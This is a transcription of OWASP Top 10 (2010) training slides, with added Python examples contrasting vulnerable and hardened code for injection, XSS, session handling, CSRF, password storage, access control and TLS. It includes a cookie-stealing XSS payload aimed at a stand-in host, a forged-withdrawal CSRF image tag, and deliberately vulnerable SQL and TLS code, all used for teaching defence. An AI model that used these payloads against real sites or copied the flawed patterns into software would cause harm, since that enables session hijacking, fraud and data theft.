

  1. OWASP. Daniel Brzozowski, daniel@brzozowski.biz

  2. Agenda: 1. Few words about OWASP 2. OWASP resources 3. Setting up workstations 4. OWASP WebScarab/OWASP WebScarab-NG 5. O2 Platform

  3. About me… In London since October 2010. Before that MCPD, MCTS, MCP. OWASP WebScarab-NG & OWASP .NET Project Leader.

  4. Introduction – Web security. Growing popularity of this subject… What is a security bug? Why do we have such bugs? What about statistics?

  5. Penetration test. What is a penetration test? Types: passive, active. Phases against the target application: mapping, research, attack, report.

  6. OWASP

  7. What is OWASP? The Open Web Application Security Project (OWASP) is a 501(c)(3) not-for-profit worldwide charitable organization focused on improving the security of application software. Core values: Open, Innovation, Global, Integrity.

  8. OWASP local chapters

  9. OWASP London Chapter. Led by Justin Clarke. Meetings: visit the page https://www.owasp.org/index.php/London and subscribe to the mailing list!

  10. OWASP resources you can use today!
     SDLC • Guides (Testing, Development, Code Review) • SAMM • ASVS
     Community • Mailing lists • Chapters • Conferences
     Tools • WebGoat • WebScarab/WebScarab-NG • ESAPI • O2 Platform • OWASP Live CD • …

  11. OWASP Live CD: https://www.owasp.org/index.php/Category:OWASP_Live_CD_Project

  12. OWASP Top 10

  13. OWASP Top 10 (2010)
     A1: Injection
     A2: Cross-Site Scripting (XSS)
     A3: Broken Authentication and Session Management
     A4: Insecure Direct Object References
     A5: Cross-Site Request Forgery (CSRF)
     A6: Security Misconfiguration
     A7: Insecure Cryptographic Storage
     A8: Failure to Restrict URL Access
     A9: Insufficient Transport Layer Protection
     A10: Unvalidated Redirects and Forwards

  14. A1: Injection
     Injection means…
     • Tricking an application into including unintended commands in the data sent to an interpreter
     Interpreters…
     • Take strings and interpret them as commands
     • SQL, OS shell, LDAP, XPath, Hibernate, etc…
     SQL injection is still quite common
     • Many applications are still susceptible (really don't know why)
     • Even though it's usually very simple to avoid
     Typical impact
     • Usually severe. The entire database can usually be read or modified
     • May also allow access to the full database schema, to accounts, or even OS-level access

  15. Attack example – OWASP Top 10 A1: Injection: SQL injection (user vs. hacker). The vulnerable code concatenates the raw request parameter straight into the SQL string:
     String userInput = s.getParser().getRawParameter(USERNAME, "");
     String SELECT_ST = "select * from employee where userid=" + userInput;

  16. A1: Injection. December 2009: a hacker used SQL injection techniques to hack the database of RockYou. RockYou creates applications for MySpace, Facebook, … Result: data of 32,603,388 users and administrative accounts was compromised (credentials, with passwords in clear text); the data also contained e-mail addresses and passwords for third-party sites. Question: how many of those users use the same password for other sites too?

  17. A2: XSS
     Occurs any time…
     • Raw data from an attacker is sent to an innocent user's browser
     Raw data…
     • Stored in a database
     • Reflected from web input (form field, hidden field, URL, etc…)
     • Sent directly into a rich JavaScript client
     Typical impact
     • Steal the user's session, steal sensitive data, rewrite the web page, redirect the user to a phishing or malware site
     • Most severe: install an XSS proxy which allows the attacker to observe and direct all of the user's behaviour on the vulnerable site and force the user to other sites

  18. A2: XSS. "A new cross-site scripting (XSS) weakness has been identified on Twitter and can be leveraged by attackers to hijack users' sessions and post on their behalf." Posted on xssed.com: http://www.xssed.com/mirror/68655/
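An added example (not from the slides) of the "raw data reflected into the browser" case in Python: the same request parameter rendered without and with output encoding, once in an HTML body context and once inside an attribute value, where a single quote character is enough to break out. The attacker payloads and the hostname evil.example are constructed; the small parser-based check at the end is only there to show that the encoded output contains no script tag or event handler.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs (hypothetical collector host evil.example).
COOKIE_THEFT = '<script>new Image().src="http://evil.example/?c="+document.cookie</script>'
ATTR_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'


def render_greeting_vulnerable(name):
    """Reflects the raw request parameter into the HTML body."""
    return "<p>Hello, " + name + "</p>"


def render_greeting_safe(name):
    """Entity-encodes for the body context: < > & " ' become entities."""
    return "<p>Hello, " + html.escape(name, quote=True) + "</p>"


def render_search_box_vulnerable(query):
    """Reflects into an attribute value; a quote in the input closes it."""
    return '<input name="q" value="' + query + '">'


def render_search_box_safe(query):
    """quote=True is what keeps the value inside the attribute."""
    return '<input name="q" value="' + html.escape(query, quote=True) + '">'


class ActiveContentFinder(HTMLParser):
    """Reports script tags and on* event-handler attributes in parsed markup."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append("event handler " + name)


def active_content(markup):
    finder = ActiveContentFinder()
    finder.feed(markup)
    return finder.findings


if __name__ == "__main__":
    for page in (render_greeting_vulnerable(COOKIE_THEFT), render_greeting_safe(COOKIE_THEFT),
                 render_search_box_vulnerable(ATTR_BREAKOUT), render_search_box_safe(ATTR_BREAKOUT)):
        print(active_content(page), page)
```

Encoding is context-specific: html.escape is right for HTML body and quoted attribute values, but data placed inside a script block, a URL, or a CSS value needs the encoding for that context instead.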

  19. A3: Broken Authentication and Session Management
     HTTP is a "stateless" protocol
     • Means credentials have to go with every request
     • Should use SSL for everything requiring authentication
     Session management flaws
     • The SESSION ID is used to track state since HTTP doesn't
     • and it is just as good as credentials to an attacker
     • The SESSION ID is typically exposed on the network, in the browser, in logs, …
     Beware the side-doors
     • Change my password, remember my password, forgot my password, secret question, logout, email address, etc…
     Typical impact
     • User accounts compromised or user sessions hijacked
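Because the session ID is "just as good as credentials", the practical questions are how it is generated, when it is rotated and how it is exposed. The following added example (not from the slides; a constructed server-side store in Python) generates IDs from the OS CSPRNG, rotates the ID at login so a value planted in the victim's browser beforehand never becomes an authenticated session, invalidates server-side on logout, and emits the cookie with the Secure and HttpOnly attributes that keep it off plain HTTP and away from script.

```python
import secrets


class SessionStore:
    """Constructed server-side session table keyed by an unguessable id."""

    def __init__(self):
        self._sessions = {}

    def _new_id(self):
        # 256 bits from the OS CSPRNG; never a counter, timestamp or hash of the username.
        return secrets.token_urlsafe(32)

    def start_anonymous(self):
        sid = self._new_id()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid, user):
        """Rotate the id at authentication. An id an attacker planted in the
        victim's browser (session fixation) is dropped; only the fresh id,
        which the attacker never saw, is bound to the authenticated user."""
        state = self._sessions.pop(presented_sid, None) or {"user": None}
        state["user"] = user
        new_sid = self._new_id()
        self._sessions[new_sid] = state
        return new_sid

    def logout(self, sid):
        """Invalidate server-side; clearing the cookie alone leaves the id usable."""
        self._sessions.pop(sid, None)

    def user_for(self, sid):
        state = self._sessions.get(sid)
        return state["user"] if state else None


def session_cookie(sid):
    """Secure: only sent over HTTPS. HttpOnly: not readable by page script,
    so an XSS flaw cannot simply read document.cookie."""
    return "SESSIONID=" + sid + "; Path=/; Secure; HttpOnly"


if __name__ == "__main__":
    store = SessionStore()
    planted = store.start_anonymous()      # value an attacker could have fixed in the browser
    authed = store.login(planted, "alice")
    print(planted, store.user_for(planted))
    print(session_cookie(authed), store.user_for(authed))
```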

  20. A4: Insecure Direct Object References
     How do you protect access to your data?
     • This is part of enforcing proper "authorization", along with A8 – Failure to Restrict URL Access
     A common mistake…
     • Only listing the 'authorized' objects for the current user, or
     • Hiding the object references in hidden fields
     • … and then not enforcing these restrictions on the server side
     • This is called presentation layer access control, and doesn't work
     • Attacker simply tampers with the parameter value
     Typical impact
     • Users are able to access unauthorized files or data

  21. A4: Insecure Direct Object References

  22. A5: CSRF – Cross Site Request Forgery
     • An attack where the victim's browser is tricked into issuing a command to a vulnerable web application
     • The vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request
     Imagine…
     • What if a hacker could steer your mouse and get you to click on links in your online banking application?
     • What could they make you do?
     Typical impact
     • Initiate transactions (transfer funds, log out the user, close the account)
     • Access sensitive data
     • Change account details

  23. A5: CSRF
     <img src="http://bank.com/withdraw?fromId=12314&amount=1000000&toID=12312">
     Can be injected by XSS, or served from a phishing site
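What the image tag above exploits is that the browser attaches the session cookie on its own; what stops it is a value the attacker's page cannot obtain. The following added example (not code from the slides; a constructed Python stand-in for the bank endpoint) refuses state changes on GET and requires a per-session anti-CSRF token that is embedded in the bank's own form. The forged request carries the cookie but not the token, because the same-origin policy keeps the attacker's page from reading the bank's form.

```python
import hmac
import secrets


class BankApp:
    """Constructed stand-in for the bank.com /withdraw endpoint on the slide."""

    def __init__(self):
        self.balances = {"12314": 1_000_000, "12312": 0}
        self._csrf_tokens = {}               # session id -> per-session secret token

    def render_transfer_form(self, session_id):
        """Only the bank's own page carries the token; an attacker's page cannot read it."""
        token = secrets.token_hex(16)
        self._csrf_tokens[session_id] = token
        return ('<form method="POST" action="/withdraw">'
                '<input type="hidden" name="csrf" value="' + token + '">'
                '<input name="fromId"><input name="toID"><input name="amount">'
                '</form>')

    def withdraw(self, session_id, method, params):
        """Returns True only if the transfer executes. The session cookie arrives
        either way; the forged request is rejected because it lacks the token."""
        if method != "POST":                 # a state change is never performed on GET
            return False
        expected = self._csrf_tokens.get(session_id)
        supplied = params.get("csrf", "")
        if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
            return False
        amount = int(params["amount"])
        src, dst = params["fromId"], params["toID"]
        if self.balances.get(src, 0) < amount:
            return False
        self.balances[src] -= amount
        self.balances[dst] = self.balances.get(dst, 0) + amount
        return True


def token_from_form(markup):
    """Helper for the demo: pull the hidden token out of the rendered form."""
    return markup.split('name="csrf" value="', 1)[1].split('"', 1)[0]


# The parameters of the <img src> request on the slide, as the bank receives them.
FORGED_IMG_REQUEST = {"fromId": "12314", "amount": "1000000", "toID": "12312"}


if __name__ == "__main__":
    bank = BankApp()
    sid = "victim-session"                   # the cookie the browser attaches automatically
    print("forged GET executed:", bank.withdraw(sid, "GET", FORGED_IMG_REQUEST))
    token = token_from_form(bank.render_transfer_form(sid))
    print("legit POST executed:", bank.withdraw(sid, "POST", dict(FORGED_IMG_REQUEST, csrf=token)))
    print(bank.balances)
```

Requiring POST alone is not enough (a hidden auto-submitting form on the attacker's page can POST); the token is what ties the request to a page the user actually loaded from the bank.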

  24. A5: CSRF. April 2010. No specific details: "the victim's transaction details will be sent to the attacker's Website".

  25. A6: Security Misconfiguration
     Web applications rely on a secure foundation
     • All through the network and platform
     • Don't forget the development environment
     Is your source code a secret?
     • Think of all the places your source code goes
     • Security should not require secret source code
     Configuration management must extend to all parts of the application
     • All credentials should change in production
     Typical impact
     • Install backdoor through missing network or server patch
     • XSS flaw exploits due to missing application framework patches
     • Unauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration

  26. A7: Insecure Cryptographic Storage
     Storing sensitive data insecurely
     • Failure to identify all sensitive data
     • Failure to identify all the places that this sensitive data gets stored
     • Databases, files, directories, log files, backups, etc.
     • Failure to properly protect this data in every location
     Typical impact
     • Attackers access or modify confidential or private information
     • e.g. credit cards, health care records, financial data (yours or your customers')
     • Attackers extract secrets to use in additional attacks
     • Company embarrassment, customer dissatisfaction, and loss of trust
     • Expense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insurance
     • Business gets sued and/or fined

  27. A7: Insecure Cryptographic Storage
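The RockYou breach on slide 16 is the textbook case for this category: the credential table held the passwords themselves. The following added example (not from the slides) shows the storage format a practitioner would use instead, in Python's standard library: a per-password random salt, an iterated PBKDF2-HMAC-SHA256 derivation, a self-describing stored string so the iteration count can be raised later, and a constant-time comparison on verification. The iteration count and the sample password are constructed values.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 100_000        # constructed; raise over time as hardware gets faster


def hash_password(password, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256. The stored string carries the
    algorithm, iteration count and salt, so verification needs nothing else."""
    if salt is None:
        salt = os.urandom(16)     # unique per password: same password, different stored hash
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute with the stored parameters and compare in constant time."""
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)


def store_credentials(users):
    """What goes into the credential table: never the password itself."""
    return {user: hash_password(password) for user, password in users}


if __name__ == "__main__":
    table = store_credentials([("alice", "password123"), ("bob", "password123")])
    for user, stored in table.items():
        print(user, stored)
    print(verify_password("password123", table["alice"]), verify_password("wrong", table["alice"]))
```

A dump of this table gives the attacker salted, slow hashes to crack one at a time instead of 32 million passwords to read; it does not help users who reused the password elsewhere once it is cracked, which is why the slide's final question still matters.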

  28. A8: Failure to Restrict URL Access
     How do you protect access to URLs (pages)?
     • This is part of enforcing proper "authorization", along with A4 – Insecure Direct Object References
     A common mistake…
     • Displaying only authorized links and menu choices
     • This is called presentation layer access control, and doesn't work
     • Attacker simply forges direct access to 'unauthorized' pages
     Typical impact
     • Attackers invoke functions and services they're not authorized for
     • Access other users' accounts and data
     • Perform privileged actions

  29. A8: Failure to Restrict URL Access. Date published: 13/02/2010. WordPress version 2.9: ability to view deleted messages by other users.
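Slides 20 and 28 describe the same mistake from two angles: the UI lists only the user's own object IDs (A4) or only the links the user's role may see (A8), and the server then trusts whatever ID or URL arrives. The following added example (not code from the slides; constructed users, roles, documents and a page-to-role map in Python) puts the presentation-layer version beside the server-side check for both cases. Responses are (status, body) tuples; the hardened handlers deny by default and answer 403 for "missing" and "not yours" alike, so the status code does not leak which IDs exist.

```python
# Constructed users, roles, documents and page-to-role map.
ROLES = {"alice": "user", "bob": "user", "mallory": "user", "root": "admin"}
DOCS = {
    1001: {"owner": "alice", "body": "alice: tax return"},
    1002: {"owner": "bob", "body": "bob: payslip"},
}
PAGE_ROLES = {"/account": "user", "/admin/users": "admin"}


def document_link_list(current_user):
    """The 'presentation layer' control: the UI lists only the user's own ids."""
    return [doc_id for doc_id, d in DOCS.items() if d["owner"] == current_user]


def get_document_insecure(current_user, doc_id):
    """A4: trusts the id from the request because the UI 'only showed' the
    right ones. Anyone who edits the parameter reads anyone's document."""
    doc = DOCS.get(doc_id)
    return (200, doc["body"]) if doc else (404, "")


def get_document(current_user, doc_id):
    """A4 fixed: ownership is re-checked on the server for every request."""
    doc = DOCS.get(doc_id)
    if doc is None or doc["owner"] != current_user:
        return (403, "")            # same answer for 'missing' and 'not yours'
    return (200, doc["body"])


def open_page_insecure(current_user, path):
    """A8: the admin link is hidden from non-admins, but the URL is served to
    anyone who types it."""
    return (200, path) if path in PAGE_ROLES else (404, "")


def open_page(current_user, path):
    """A8 fixed: every URL maps to a required role; unmapped URLs are denied."""
    required = PAGE_ROLES.get(path)
    if required is None:
        return (403, "")
    role = ROLES.get(current_user)
    if role is None or (required == "admin" and role != "admin"):
        return (403, "")
    return (200, path)


if __name__ == "__main__":
    print("links shown to mallory:", document_link_list("mallory"))
    print("mallory tampers id ->", get_document_insecure("mallory", 1001), get_document("mallory", 1001))
    print("alice types admin URL ->", open_page_insecure("alice", "/admin/users"), open_page("alice", "/admin/users"))
```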

  30. A9: Insufficient Transport Layer Protection
     Transmitting sensitive data insecurely
     • Failure to identify all sensitive data
     • Failure to identify all the places that this sensitive data is sent
     • On the web, to backend databases, to business partners, internal communications
     • Failure to properly protect this data in every location
     Typical impact
     • Attackers access or modify confidential or private information
     • e.g. credit cards, health care records, financial data (yours or your customers')
     • Attackers extract secrets to use in additional attacks
     • Company embarrassment, customer dissatisfaction, and loss of trust
     • Expense of cleaning up the incident
     • Business gets sued and/or fined

  31. A9: Insufficient Transport Layer Protection
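"Properly protect this data in every location" includes the backend and partner connections the application itself opens, and those are where verification is most often switched off to silence a certificate error. The following added example (not from the slides) builds the two client-side TLS configurations in Python's ssl module, the one that silences the error and the one a practitioner would ship, and a small audit function that flags the settings which turn TLS into an unauthenticated tunnel: no certificate verification, no hostname check, or protocol versions below TLS 1.2. No network connection is made.

```python
import ssl


def insecure_client_context():
    """The context written to 'make the error go away': the server's certificate
    and hostname are not checked, so any man-in-the-middle with a self-signed
    certificate terminates the connection and reads the traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context():
    """Verify the server against the platform CA store, check the hostname,
    and refuse protocol versions below TLS 1.2."""
    ctx = ssl.create_default_context()            # CERT_REQUIRED + check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_client_context(ctx):
    """Return the list of problems; an empty list means the context is acceptable."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate not verified (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        findings.append("hostname not checked against the certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol versions below TLS 1.2 allowed")
    return findings


if __name__ == "__main__":
    print("insecure:", audit_client_context(insecure_client_context()))
    print("hardened:", audit_client_context(hardened_client_context()))
```

The same three properties are what to look for in a code review of any outbound HTTPS, database or partner connection: a `verify=False`, a disabled hostname check or a legacy protocol floor each means the "TLS" link no longer authenticates the other end.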
